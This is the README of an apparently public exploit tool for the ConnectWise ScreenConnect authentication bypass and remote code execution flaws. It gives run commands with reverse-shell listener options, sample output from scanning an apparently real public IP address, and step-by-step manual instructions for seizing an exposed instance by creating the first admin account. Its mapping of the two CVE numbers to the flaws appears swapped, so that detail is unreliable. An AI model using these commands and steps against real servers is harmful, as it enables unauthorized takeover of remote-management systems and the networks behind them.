A Python tool to check & exploit CVE-2024-1708 & CVE-2024-1709 in ConnectWise ScreenConnect# ScreenConnect CVE-2024-1709 Exploit Tool
A Python tool to check for and exploit the authentication bypass (CVE-2024-1708) and resulting remote code execution (CVE-2024-1709) vulnerabilities in ConnectWise ScreenConnect (ConnectWise Control).
### Description
This tool performs two main functions:
Check Mode: Tests a target ConnectWise ScreenConnect server for the authentication bypass vulnerability (CVE-2024-1708).
Exploit Mode: Attempts to exploit the vulnerability chain, provides reconnaissance on accessible endpoints, and guides manual exploitation, particularly for targets in the initial setup phase.
### Features
- **Vulnerability Checking:** Quickly determines if a target is vulnerable.
- **Admin Endpoint Discovery:** Automatically searches for accessible administrative panels after a successful auth bypass.
- **Setup Mode Detection:** Identifies targets that are in the initial setup state, allowing for manual admin account creation.
- **Clear Reporting:** Provides clear, color-coded output on the target's status.
## Usage
### Prerequisites
- Python 3.x
- The `requests` library.
Install the required library:
```bash
pip install requests
```
## Basic Usage
To check if a target is vulnerable:
```bash
python3 screenconnect_exploit.py -u http://target-server:8040 -c
```
### Exploitation Guidance
The tool can also guide exploitation attempts. You must specify a listener IP and port (even if the final payload delivery is manual).
```bash
python3 screenconnect_exploit.py -u http://target-server:8040 -l YOUR_IP -p 4444
```
### Arguments
| Argument| Description | Required For |
| :--- | :---| :--- |
|`-u URL`, `--url URL` | Target URL (e.g.,`http://10.0.0.1:8040`) | Always |
|`-c`, `--check`| Run in check-only mode | Check |
|` -l LHOST `, `--lhost LHOST ` | Listen IP address for reverse shell | Exploit |
|`-p LPORT ` , `--lport LPORT ` | Listen port for reverse shell | Exploit |
## Example Output
[\*] Checking target: http://99.230.149.89:8040
[\*] VULNERABLE: Authentication bypass successful!
## Exploitation Reconnaissance
[\*] Attempting exploitation on http://99.230.149.89:8040
[\*] Checking target: http://99.230.149.89:8040
[\*] VULNERABLE: Authentication bypass successful!
[\*] Found accessible admin endpoint: /Administration
[\*] Target is in setup mode - you can create admin account manually!
[\*] Visit: http://99.230.149.89:8040
[\*] Create an account with valid email format (user@example.com)
## Manual Exploitation Steps
If the tool finds a vulnerable target but automated RCE fails, follow these steps:
1. **Access the Admin Panel:** The tool will output accessible URLs like
` http://target:8040/Administration. ` Open this in your browser.
2. **Complete Setup (if applicable):** If the tool detects "setup mode," go to the main URL and create the first admin account using a **valid email address.**
3. **You're In:** Once in the admin panel, you have full control of the ScreenConnect instance.
## Disclaimer
This tool is provided for **educational and authorized testing purposes only.** The user is responsible for ensuring they have explicit permission to test any system before using this tool. Unauthorized use against any system is illegal.
## License
This project is licensed under the MIT License - see the LICENSE file for details.
## References
- [ConnectWise Security Bulletin](https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8)
- [CVE-2024-1708](https://nvd.nist.gov/vuln/detail/CVE-2024-1708)
- [CVE-2024-1709](https://nvd.nist.gov/vuln/detail/CVE-2024-1709)
登录后查看神龙缓存的 POC 文件快照
登录查看